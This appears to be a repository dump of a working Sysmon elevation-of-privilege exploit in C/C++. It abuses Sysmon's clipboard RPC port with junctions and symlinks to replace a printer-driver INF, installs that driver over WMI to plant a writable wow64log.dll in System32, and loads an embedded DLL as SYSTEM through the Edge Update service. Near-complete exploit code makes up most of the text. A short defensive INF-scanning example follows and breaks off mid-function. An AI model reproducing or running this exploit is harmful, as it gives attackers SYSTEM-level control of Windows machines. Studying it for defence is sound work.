      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
    </Filter>
  </ItemGroup>
  <ItemGroup>
    <ClCompile Include="main.cpp">
      <Filter>Source Files</Filter>
    </ClCompile>
    <ClCompile Include="sysmon_c.c">
      <Filter>Source Files</Filter>
    </ClCompile>
  </ItemGroup>
  <ItemGroup>
    <Midl Include="sysmon.idl">
      <Filter>Source Files</Filter>
    </Midl>
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="def.h">
      <Filter>Header Files</Filter>
    </ClInclude>
    <ClInclude Include="resource.h">
      <Filter>Header Files</Filter>
    </ClInclude>
  </ItemGroup>
  <ItemGroup>
    <ResourceCompile Include="resource.rc">
      <Filter>Resource Files</Filter>
    </ResourceCompile>
  </ItemGroup>
</Project>

================================================
FILE: v2/SysmonEoP/SysmonEOP.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup />
</Project>

================================================
FILE: v2/SysmonEoP/def.h
================================================
#include <Windows.h>
#include <winternl.h>
#include <combaseapi.h>
#include <comdef.h>
#include <stdio.h>
#include <Wbemidl.h>
#include "sysmon_h.h"
#include "resource.h"


#pragma comment(lib, "wbemuuid.lib")
#pragma comment(lib,"RpcRT4.lib")
#pragma warning(disable:4996)

struct __declspec(uuid("A6B716CB-028B-404D-B72C-50E153DD68DA")) CLSID_MSEdge_Object;
class __declspec(uuid("79e0c401-b7bc-4de5-8104-71350f3a9b67")) IGoogleUpdate : IUnknown {
public:


    HRESULT CheckForUpdate(const WCHAR* guid, VOID* observer);
    HRESULT Update(const WCHAR* guid, VOID* observer);

};

//Variables
wchar_t object[] = L"Global\\GLOBALROOT\\RPC Control\\CLIP-876BEE15B64B610D2505A44596ED92FBA9624DB923F9D608698BD8C8E64E4F1A";
wchar_t sysmon[] = L"C:\\SYSMON";
HANDLE hSysmon;
//Functions*
LPWSTR Find();
void load();
BOOL AddPrinterDriverWmi();
void Trigger(LPWSTR alpc);
LPWSTR  BuildPath(LPCWSTR path);
BOOL CreateJunction(HANDLE dir, LPCWSTR target);
BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target);
BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target);
BOOL DeleteJunction(HANDLE dir);
VOID SetJunction();
typedef struct _REPARSE_DATA_BUFFER {
    ULONG  ReparseTag;
    USHORT ReparseDataLength;
    USHORT Reserved;
    union {
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            ULONG  Flags;
            WCHAR  PathBuffer[1];
        } SymbolicLinkReparseBuffer;
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            WCHAR  PathBuffer[1];
        } MountPointReparseBuffer;
        struct {
            UCHAR DataBuffer[1];
        } GenericReparseBuffer;
    } DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;
typedef struct _OBJECT_DIRECTORY_INFORMATION {
    UNICODE_STRING Name;
    UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
#define STATUS_MORE_ENTRIES 0x00000105
#define STATUS_NO_MORE_ENTRIES 0x8000001A
#define IO_REPARSE_TAG_MOUNT_POINT              (0xA0000003L)

typedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK   IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_      HANDLE  DirectoryHandle, _Out_opt_ PVOID   Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_  BOOLEAN RestartScan, _Inout_   PULONG  Context, _Out_opt_ PULONG  ReturnLength);
typedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE  FileHandle,PIO_STATUS_BLOCK  IoStatusBlock,PVOID  FileInformation,ULONG  Length,ULONG FileInformationClass);

_RtlInitUnicodeString pRtlInitUnicodeString;
_NtCreateFile pNtCreateFile;
_NtSetInformationFile pNtSetInformationFile;
_NtQueryDirectoryObject pNtQueryDirectoryObject;
_NtOpenDirectoryObject pNtOpenDirectoryObect;

================================================
FILE: v2/SysmonEoP/main.cpp
================================================
#include "def.h"


int wmain(int argc, wchar_t* argv[])
{
    load();
    LPWSTR alpc = Find();
    HANDLE h1;
    if (alpc == NULL) {
        printf("[!] Failed to find ALPC port!\n");
        return 1;
    }
    
    // Object-manager symlink \RPC Control\CLIP-<hash> -> \??\...\prnge001.inf. Once
    // C:\Sysmon is a junction to \RPC Control, Sysmon's create/delete of
    // C:\Sysmon\CLIP-<hash> is redirected to the printer driver INF.
    DosDeviceSymLink(object, BuildPath(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf"));
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SetJunction, NULL, 0, NULL);
   
    Trigger(alpc);
   
    // Round 1: the delete Sysmon issues after archiving removes the INF. Poll until it is
    // gone; FILE_SHARE_DELETE keeps these probes from blocking that delete.
    do {
        h1 = CreateFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
        if (h1 != INVALID_HANDLE_VALUE) CloseHandle(h1);
    } while (h1 != INVALID_HANDLE_VALUE);
    Sleep(500);
    // FILE_FLAG_DELETE_ON_CLOSE: the junction directory disappears, so C:\Sysmon is
    // absent again when the next archive is attempted.
    CloseHandle(hSysmon);
    printf("[+] Driver setup info file deleted!\n");
    // Round 2: same redirection, this time so the archived clipboard payload (the INF
    // text in Trigger) is written into the now-missing prnge001.inf.
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SetJunction, NULL, 0, NULL);
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Trigger, alpc, 0, NULL);
    // Opened without FILE_SHARE_DELETE and deliberately kept open: Sysmon's follow-up
    // delete of the archived file then fails with a sharing violation.
    do {
        h1 = CreateFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    } while (h1 == INVALID_HANDLE_VALUE);
    HMODULE hm = GetModuleHandle(NULL);
    HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L"dll");
    if (res == NULL) {
        printf("[!] Embedded DLL resource not found!\n");
        return 1;
    }
    DWORD DllSize = SizeofResource(hm, res);
    void* DllBuff = LoadResource(hm, res);
    printf("[+] Driver setup info file written.\n");
    if (!AddPrinterDriverWmi()) {
        printf("[!] Failed to add print driver!\n");
        return 1;
    }
   
    // [Test.CopyFiles.security] in the INF grants GENERIC_ALL to Authenticated Users on
    // the copied file, so the freshly installed wow64log.dll is writable from here.
    HANDLE dll;
    do {
        Sleep(1000);
        dll = CreateFile(L"C:\\windows\\system32\\wow64log.dll", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    } while (dll == INVALID_HANDLE_VALUE);
    printf("[+] DLL created!\n");
    DWORD written = 0;
    WriteFile(dll, DllBuff, DllSize, &written, NULL);
    CloseHandle(dll);
    printf("[*] Triggering Edge Update service!\n");
    HRESULT coini = CoInitialize(NULL);
    IGoogleUpdate* updater = NULL;

    HRESULT hr = CoCreateInstance(__uuidof(CLSID_MSEdge_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(updater), (PVOID*)&updater);
    
   
    DelDosDeviceSymLink(object, BuildPath(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf"));
    DeleteJunction(hSysmon);
    while(!DeleteFile(L"C:\\windows\\system32\\wow64log.dll")){}
    return 0;
}

VOID SetJunction() {
    hSysmon = INVALID_HANDLE_VALUE;
    SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);

    // Spin until Sysmon has created C:\sysmon, then open the directory itself (no reparse
    // point following). DELETE_ON_CLOSE removes it again when the handle is closed.
    do {
        hSysmon = CreateFile(L"C:\\sysmon", FILE_WRITE_ATTRIBUTES | DELETE, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_DELETE_ON_CLOSE, NULL);

    } while (hSysmon == INVALID_HANDLE_VALUE);

    // Turn the directory into a junction to \RPC Control so that C:\sysmon\CLIP-<hash>
    // resolves to the object-manager symlink created with DefineDosDevice.
    CreateJunction(hSysmon, L"\\RPC Control");

}

void load() {
    HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
    if (ntdll != NULL) {
        pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, "RtlInitUnicodeString");
        pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, "NtCreateFile");
        pNtQueryDirectoryObject = (_NtQueryDirectoryObject)GetProcAddress(ntdll, "NtQueryDirectoryObject");
        pNtOpenDirectoryObect = (_NtOpenDirectoryObject)GetProcAddress(ntdll, "NtOpenDirectoryObject");
        pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll, "NtSetInformationFile");
    }
    if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL || pNtQueryDirectoryObject == NULL || pNtOpenDirectoryObect == NULL|| pNtSetInformationFile == NULL) {
        printf("Cannot load api's %d\n", GetLastError());
        exit(0);
    }

}



BOOL CreateJunction(HANDLE hDir, LPCWSTR target) {
    HANDLE hJunction;
    DWORD cb;
    wchar_t printname[] = L"";
    if (hDir == INVALID_HANDLE_VALUE) {
        printf("[!] HANDLE invalid!\n");
        return FALSE;
    }
    SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);
    SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);
    // ReparseDataLength = the four USHORT offset/length fields (8) + both names + their
    // two UTF-16 terminators (4); the header (tag, length, reserved) adds 8 more.
    SIZE_T PathLen = TargetLen + PrintnameLen + 12;
    SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer));
    PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);
    Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    Data->ReparseDataLength = PathLen;
    Data->Reserved = 0;
    Data->MountPointReparseBuffer.SubstituteNameOffset = 0;
    Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;
    memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);
    Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);
    Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;
    memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1, printname, PrintnameLen + 2);
    WCHAR dir[MAX_PATH] = { 0x0 };
    if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL, 0, &cb, NULL) != 0)
    {

        GetFinalPathNameByHandle(hDir, dir, MAX_PATH, 0);
        printf("[+] Junction %ls -> %ls created!\n", dir, target);
        free(Data);
        return TRUE;

    }
    else
    {

        printf("[!] Error: %d. Exiting\n", GetLastError());
        free(Data);
        return FALSE;
    }
}
BOOL DeleteJunction(HANDLE handle) {
    REPARSE_GUID_DATA_BUFFER buffer = { 0 };
    BOOL ret;
    buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    DWORD cb = 0;
    IO_STATUS_BLOCK io;
    if (handle == INVALID_HANDLE_VALUE) {
        printf("[!] HANDLE invalid!\n");
        return FALSE;
    }
    WCHAR dir[MAX_PATH] = { 0x0 };
    if (DeviceIoControl(handle, FSCTL_DELETE_REPARSE_POINT, &buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL)) {
        GetFinalPathNameByHandle(handle, dir, MAX_PATH, 0);
        printf("[+] Junction %ls deleted!\n", dir);
        return TRUE;
    }
    else
    {
        printf("[!] Error: %d.\n", GetLastError());
        return FALSE;
    }
}

BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object, target)) {
        printf("[+] Symlink %ls -> %ls created!\n", object, target);
        return TRUE;

    }
    else
    {
        printf("error :%d\n", GetLastError());
        return FALSE;

    }
}

BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {
        printf("[+] Symlink %ls -> %ls deleted!\n", object, target);
        return TRUE;

    }
    else
    {
        printf("error :%d\n", GetLastError());
        return FALSE;


    }
}

LPWSTR Find() {
    HANDLE rpccontrolobj;
    OBJECT_ATTRIBUTES obj;
    const wchar_t rpccontrol[] = L"\\RPC Control";
    UNICODE_STRING unicode_string = { 0 };
    pRtlInitUnicodeString(&unicode_string, rpccontrol);
    InitializeObjectAttributes(&obj, &unicode_string, 0, 0, 00);
    // DIRECTORY_QUERY | DIRECTORY_TRAVERSE
    NTSTATUS result = pNtOpenDirectoryObect(&rpccontrolobj, 0x0001 | 0x0002, &obj);
    if (result != 0) {
        return NULL;
    }

    // Walk every object in \RPC Control looking for Sysmon's clipboard ALPC port. The
    // returned name points into this buffer, which therefore stays allocated.
    BYTE* buffer = (BYTE*)malloc(100000);
    if (buffer == NULL) {
        CloseHandle(rpccontrolobj);
        return NULL;
    }

    ULONG start = 0, index = 0, bytes;
    BOOLEAN restart = TRUE;
    for (;;)
    {
        result = pNtQueryDirectoryObject(rpccontrolobj, (PBYTE)buffer, 100000, FALSE, restart, &index, &bytes);
        // The entries are valid for STATUS_SUCCESS and STATUS_MORE_ENTRIES alike.
        if (result == 0 || result == STATUS_MORE_ENTRIES)
        {
            POBJECT_DIRECTORY_INFORMATION objectlist = (POBJECT_DIRECTORY_INFORMATION)buffer;
            for (ULONG i = 0; i < index - start; i++)
            {
                if (0 == wcsncmp(objectlist[i].TypeName.Buffer, L"ALPC Port", objectlist[i].TypeName.Length / sizeof(WCHAR)))
                {
                    if (wcsstr(objectlist[i].Name.Buffer, L"syscliprpc")) {
                        CloseHandle(rpccontrolobj);
                        return objectlist[i].Name.Buffer;
                    }
                }
            }
        }
        if (result == STATUS_MORE_ENTRIES)
        {
            start = index;
            restart = FALSE;
            continue;
        }
        // STATUS_SUCCESS (everything delivered), STATUS_NO_MORE_ENTRIES or an error: stop.
        break;
    }
    CloseHandle(rpccontrolobj);
    free(buffer);
    return NULL;
}

void Trigger(LPWSTR alpc)
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;
    wchar_t data[] = L"; Windows Inbox Printer Drivers\n\n[Version]\nSignature=\"$Windows NT$\"\nProvider=\"Microsoft\"\nClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}\nClass=Printer\nCatalogFile=prnge001.cat\nDriverVer = 06/21/2006,10.0.19041.1\n\n\n[Manufacturer]\n\"Generic\"=Generic,NTamd64\n\n[Test.CopyFiles]\nwow64log.dll,TTY.DLL,,4\n\n[Test.CopyFiles.security]\n\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\"\n\n\n[Generic.NTamd64]\n\"Generic / Text Only\"                                         = TTY.GPD,GenericGeneric_/_Tex8040,Generic_/_Text_Only\n\"Generic IBM Graphics 9pin\"                                   = GENIBM9.GPD,GenericGeneric_IBM_GD35A,Generic_IBM_Graphics_9pin\n\"Generic IBM Graphics 9pin wide\"                              = GENIBM9W.GPD,GenericGeneric_IBM_GC7D5,Generic_IBM_Graphics_9pin_wide\n\"MS Publisher Color Printer\"                                  = MSGENCOL.PPD,GenericMS_Publisher_25C7,MS_Publisher_Color_Printer\n\"MS Publisher Imagesetter\"                                    = MSGENBW.PPD,GenericMS_Publisher_B397,MS_Publisher_Imagesetter\n\n\n[TTY.GPD]\nCopyFiles=@TTYRES.DLL,@TTY.INI,@TTY.DLL,@TTYUI.DLL,@TTY.GPD,@TTYUI.HLP\nCopyFiles=Test.CopyFiles\nDataFile=TTY.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[GENIBM9.GPD]\nCopyFiles=@OK9IBRES.DLL,@GENIBM9.GPD\nDataFile=GENIBM9.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[GENIBM9W.GPD]\nCopyFiles=@OK9IBRES.DLL,@GENIBM9W.GPD\nDataFile=GENIBM9W.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[MSGENCOL.PPD]\nCopyFiles=@MSGENCOL.PPD\nDataFile=MSGENCOL.PPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\"\n\n[MSGENBW.PPD]\nCopyFiles=@MSGENBW.PPD\nDataFile=MSGENBW.PPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\"\n\n[DestinationDirs]\nDefaultDestDir=66000\nTest.CopyFiles=11\n\n[SourceDisksFiles]\nMSGENBW.PPD  = 1\nTTY.DLL      = 1\nTTYUI.HLP    = 1\nGENIBM9W.GPD = 1\nTTY.INI      = 1\nMSGENCOL.PPD = 1\nGENIBM9.GPD  = 1\nOK9IBRES.DLL = 1\nTTYUI.DLL    = 1\nTTYRES.DLL   = 1\nTTY.GPD      = 1\n\n[PrinterPackageInstallation.amd64]\nPackageAware=TRUE\nCoreDriverDependencies={D20EA372-DD35-4950-9ED8-A6335AFE79F0},{D20EA372-DD35-4950-9ED8-A6335AFE79F1}\nInboxVersionRequired=UseDriverVer\n\n[Strings]\n;Non-Localizable\n\n;Localizable\nDisk1=\"Windows Installation Disc\"\n\n[SourceDisksNames.x86]\n1   = %Disk1%,,,\"I386\"\n\n[SourceDisksNames.amd64]\n1   = %Disk1%,,,\"Amd64\"\n\n[SourceDisksNames.ia64]\n1   = %Disk1%,,,\"Ia64\"\n\n[SourceDisksNames.arm]\n1   = %Disk1%,,,\"arm\"\n\n[SourceDisksNames.arm64]\n1   = %Disk1%,,,\"arm64\"\n";
    status = RpcStringBindingCompose(NULL, (RPC_WSTR)L"ncalrpc", NULL, (RPC_WSTR)alpc, NULL, &StringBinding);

    status = RpcBindingFromStringBinding(StringBinding, &Binding);
    status = RpcStringFree(&StringBinding);
    RpcTryExcept
    {
        // Proc1 on Sysmon's syscliprpc port: the string argument is the clipboard payload
        // that Sysmon archives under C:\Sysmon\CLIP-<hash> and deletes afterwards.
        Proc1(Binding, 3036, data);
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER)
    {
        printf("Error: %lu\n", RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(&Binding);
}


LPWSTR BuildPath(LPCWSTR path) {
    // Static storage: callers use the returned pointer after this function returns.
    // Not re-entrant; each call overwrites the previous result.
    static wchar_t ntpath[MAX_PATH];
    swprintf(ntpath, MAX_PATH, L"\\??\\%s", path);
    return ntpath;
}
BOOL AddPrinterDriverWmi() {
    HRESULT hr;
    hr = CoInitializeEx(0, COINIT_MULTITHREADED);
    if (FAILED(hr))
    {
        CoUninitialize();
        return FALSE;
    }
    hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
    if (FAILED(hr))
    {
        CoUninitialize();
        return FALSE;
    }
    IWbemLocator* pLoc = NULL;

    hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);
    if (FAILED(hr))
    {
        CoUninitialize();
        return FALSE;
    }
    IWbemServices* pSvc = NULL;
    hr = pLoc->ConnectServer(_bstr_t(L"ROOT\\StandardCimv2"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
    if (FAILED(hr)) {
        pLoc->Release();
        CoUninitialize();
        return FALSE;
    }
    hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
    if (FAILED(hr)) {
        pSvc->Release();
        pLoc->Release();
        CoUninitialize();
        return FALSE;
    }
    BSTR MethodName = SysAllocString(L"Add");
    BSTR ClassName = SysAllocString(L"MSFT_PrinterDriver");
    IWbemClassObject* pClass = NULL;
    IWbemClassObject* pInParamsDefinition = NULL;
    IWbemClassObject* pClassInstance = NULL;
    IWbemClassObject* pOutParams = NULL;
    hr = pSvc->GetObject(ClassName, 0, NULL, &pClass, NULL);
    if (SUCCEEDED(hr)) hr = pClass->GetMethod(MethodName, 0, &pInParamsDefinition, NULL);
    if (SUCCEEDED(hr)) hr = pInParamsDefinition->SpawnInstance(0, &pClassInstance);
    if (SUCCEEDED(hr)) {
        // MSFT_PrinterDriver.Add(Name, InfPath) installs the driver described by the INF,
        // honouring its [Test.CopyFiles] entry and .security section. The BSTRs are owned
        // by the VARIANTs so they stay valid until the calls below have completed.
        VARIANT varCommand, varCommand2;
        VariantInit(&varCommand);
        VariantInit(&varCommand2);
        varCommand.vt = VT_BSTR;
        varCommand.bstrVal = SysAllocString(L"Generic / Text Only");
        varCommand2.vt = VT_BSTR;
        varCommand2.bstrVal = SysAllocString(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf");
        hr = pClassInstance->Put(L"Name", 0, &varCommand, 0);
        if (SUCCEEDED(hr)) hr = pClassInstance->Put(L"InfPath", 0, &varCommand2, 0);
        if (SUCCEEDED(hr)) hr = pSvc->ExecMethod(ClassName, MethodName, 0, NULL, pClassInstance, &pOutParams, NULL);
        VariantClear(&varCommand);
        VariantClear(&varCommand2);
    }
    BOOL ok = SUCCEEDED(hr);
    if (!ok) printf("[!] MSFT_PrinterDriver.Add failed: 0x%08lx\n", (unsigned long)hr);
    SysFreeString(ClassName);
    SysFreeString(MethodName);
    if (pOutParams) pOutParams->Release();
    if (pClassInstance) pClassInstance->Release();
    if (pInParamsDefinition) pInParamsDefinition->Release();
    if (pClass) pClass->Release();
    if (!ok) {
        pSvc->Release();
        pLoc->Release();
        CoUninitialize();
    }
    return ok;
}
}
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}
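Why the INF that Trigger() plants ends with a DLL in System32 that a normal user can overwrite, and a check for that pattern, as an added example that is not code from this repository. In the payload, [DestinationDirs] routes [Test.CopyFiles] to DirId 11 (System32) and the [Test.CopyFiles.security] SDDL grants GA to AU (Authenticated Users) on the copied file, which is what lets wmain() later open wow64log.dll for GENERIC_WRITE. The scanner below reads INF text with its own minimal line reader (not SetupAPI), resolves the destination directory of every X.security section and flags those that land in DirId 10 or 11 with a write grant to a low-privilege trustee. The sample INF is constructed here from the relevant sections of the exploit's payload plus two control sections; the trustee and rights lists are this example's assumptions, numeric access masks are not decoded, and strcasecmp is the POSIX name (MSVC: _stricmp).

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* strcasecmp (POSIX); on MSVC use _stricmp */

/* Constructed sample: the exploit INF's sections that decide where TTY.DLL lands and who may
 * write to it afterwards, plus two controls (read-only grant to AU; no DestinationDirs entry). */
static const char SAMPLE_INF[] =
    "[Version]\nSignature=\"$Windows NT$\"\nClass=Printer\n\n[Test.CopyFiles]\nwow64log.dll,TTY.DLL,,4\n\n"
    "[Test.CopyFiles.security]\n\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\"\n\n"
    "[ReadOnly.CopyFiles]\nfoo.gpd\n\n[ReadOnly.CopyFiles.security]\n\"D:AI(A;;GA;;;SY)(A;;GR;;;AU)(A;;GA;;;BA)\"\n\n"
    "[Elsewhere.CopyFiles]\nbar.gpd\n\n[Elsewhere.CopyFiles.security]\n\"D:AI(A;;GA;;;AU)\"\n\n"
    "[DestinationDirs]\nDefaultDestDir=66000\nTest.CopyFiles=11\nReadOnly.CopyFiles=11\n";

typedef struct {
    struct { char name[64], sddl[256]; } sec[16];   /* "<name>.security" sections and their SDDL */
    struct { char name[64]; int dir; } dest[16];    /* [DestinationDirs] entries */
    int nsec, ndest, dflt;                          /* dflt = DefaultDestDir, -1 if absent */
} Inf;

/* Next non-blank, non-comment line, trimmed of surrounding whitespace. */
static bool next_line(const char **cur, char *buf, size_t cap)
{
    while (**cur) {
        const char *p = *cur, *e = strchr(p, '\n');
        size_t len = e ? (size_t)(e - p) : strlen(p);
        *cur = e ? e + 1 : p + len;
        while (len && isspace((unsigned char)p[len - 1])) len--;
        while (len && isspace((unsigned char)*p)) p++, len--;
        if (len == 0 || *p == ';') continue;
        snprintf(buf, cap, "%.*s", (int)len, p);
        return true;
    }
    return false;
}

/* One pass: keep each "<X>.security" section's first line (its SDDL) and the DestinationDirs map. */
static void parse_inf(const char *text, Inf *inf)
{
    char line[512], section[64] = "";
    int cur = -1;                                   /* index into inf->sec while inside X.security */
    memset(inf, 0, sizeof *inf);
    inf->dflt = -1;
    while (next_line(&text, line, sizeof line)) {
        size_t n = strlen(line);
        if (line[0] == '[' && line[n - 1] == ']') {
            snprintf(section, sizeof section, "%.*s", (int)(n - 2), line + 1);
            size_t sn = strlen(section);
            cur = -1;
            if (sn > 9 && !strcasecmp(section + sn - 9, ".security") && inf->nsec < 16)
                snprintf(inf->sec[cur = inf->nsec++].name, 64, "%.*s", (int)(sn - 9), section);
        } else if (!strcasecmp(section, "DestinationDirs") && inf->ndest < 16) {
            char *eq = strchr(line, '=');
            if (!eq) continue;
            int val = atoi(eq + 1);
            for (*eq = '\0'; eq > line && isspace((unsigned char)eq[-1]); ) *--eq = '\0';
            if (!strcasecmp(line, "DefaultDestDir")) inf->dflt = val;
            else snprintf(inf->dest[inf->ndest].name, 64, "%s", line), inf->dest[inf->ndest++].dir = val;
        } else if (cur >= 0 && !inf->sec[cur].sddl[0]) {
            snprintf(inf->sec[cur].sddl, 256, "%s", line);   /* quotes stay; the ACE scan ignores them */
        }
    }
}

/* True if an access-allowed ACE grants a write-capable right (SDDL short forms GA, GW, FA, FW;
 * numeric masks are not decoded) to a trustee every local user holds: AU, WD, BU or IU. */
bool sddl_grants_write_to_low_priv(const char *sddl)
{
    static const char *low[] = { "AU", "WD", "BU", "IU" }, *wr[] = { "GA", "GW", "FA", "FW" };
    for (const char *a = strchr(sddl, '('), *end; a && (end = strchr(a, ')')); a = strchr(end, '(')) {
        char ace[128], *f[6] = { 0 };
        int k = 0;
        snprintf(ace, sizeof ace, "%.*s", (int)(end - a - 1), a + 1);
        for (char *t = ace; k < 6 && t; k++) { f[k] = t; t = strchr(t, ';'); if (t) *t++ = '\0'; }
        if (k < 6 || strcmp(f[0], "A") != 0) continue;          /* fields: type;flags;rights;;;sid */
        bool w = false, l = false;
        for (int i = 0; i < 4; i++) { w |= strstr(f[2], wr[i]) != NULL; l |= strcmp(f[5], low[i]) == 0; }
        if (w && l) return true;
    }
    return false;
}

/* Flag every CopyFiles section installed into DirId 10 (Windows) or 11 (System32) whose SDDL lets
 * a low-privilege trustee write. Flagged names go to `out`, comma-separated; returns the count. */
int scan_inf(const char *text, char *out, size_t cap)
{
    Inf inf;
    int hits = 0;
    parse_inf(text, &inf);
    out[0] = '\0';
    for (int i = 0; i < inf.nsec; i++) {
        int dir = inf.dflt;
        for (int j = 0; j < inf.ndest; j++)
            if (!strcasecmp(inf.dest[j].name, inf.sec[i].name)) dir = inf.dest[j].dir;
        if ((dir != 10 && dir != 11) || !sddl_grants_write_to_low_priv(inf.sec[i].sddl)) continue;
        size_t used = strlen(out);
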